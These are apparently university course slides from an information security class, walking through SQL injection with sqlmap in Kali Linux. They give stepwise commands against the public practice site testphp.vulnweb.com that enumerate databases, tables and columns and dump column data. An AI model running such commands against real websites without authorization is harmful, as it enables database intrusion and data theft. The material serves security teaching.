Operation Sheet 4.

1 SQL
Injection in KALI SQLMap
ICT640 – Information Security

Presented by: Dr. Patrick D. Cerna

 What is SQL injection
• SQL Injection is a code injection
technique where an attacker
executes malicious SQL queries
that control a web application’s
database. With the right set of
queries, a user can gain access
to information stored in
databases. SQLMAP tests
whether a ‘GET’ parameter is
vulnerable to SQL Injection.
 Sql MAP
• There are many SQL injection tools, but
probably the most popular is sqlmap. In this
tutorial, we will use sqlmap to compromise a
MySQL database behind a website.  

• Sqlmap can be used for databases other than

MySQL, such Microsoft's SQL Server and
Oracle, but here we will focus its capabilities
on those ubiquitous web sites that are built
with PHP, Apache and MySQL such as
WordPress, Joomla and Drupal.
 Step #1 Start sqlmap. First, fre up Kali and go
to Applications -> Database Assessment ->sqlmap,
Check the SQL MAP Details: sqlmap -h
 Step 1: Determine the DBMS
Behind the Web Site
sqlmap -u
 
http://testphp.vulnweb.com/listproducts.ph
p?cat=1 --dbs
 Step #2 Determine the DBMS
Behind the Web Site
http://testphp.vulnweb.com/
 
listproducts.php?cat=*
Step 3: List information about Tables
present in a particular Database 

sqlmap -u
http://testphp.vulnweb.com/listproduct
s.php?cat=1
-D acuart --tables
Step 4: List information about Tables present in a
particular Database

sqlmap -u
http://testphp.vulnweb.com/listproducts.php?cat=1
-D acuart --tables
Step 5: List information about the columns of a
particular table

sqlmap -u
http://testphp.vulnweb.com/listproducts.php?cat=1

-D acuart -T artists --columns

Step 6: Dump the data from the columns

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
-D acuart -T artists -C aname --dump

where -C can be used to specify multiple column name separated by a comma,

and the –dump query retrieves the data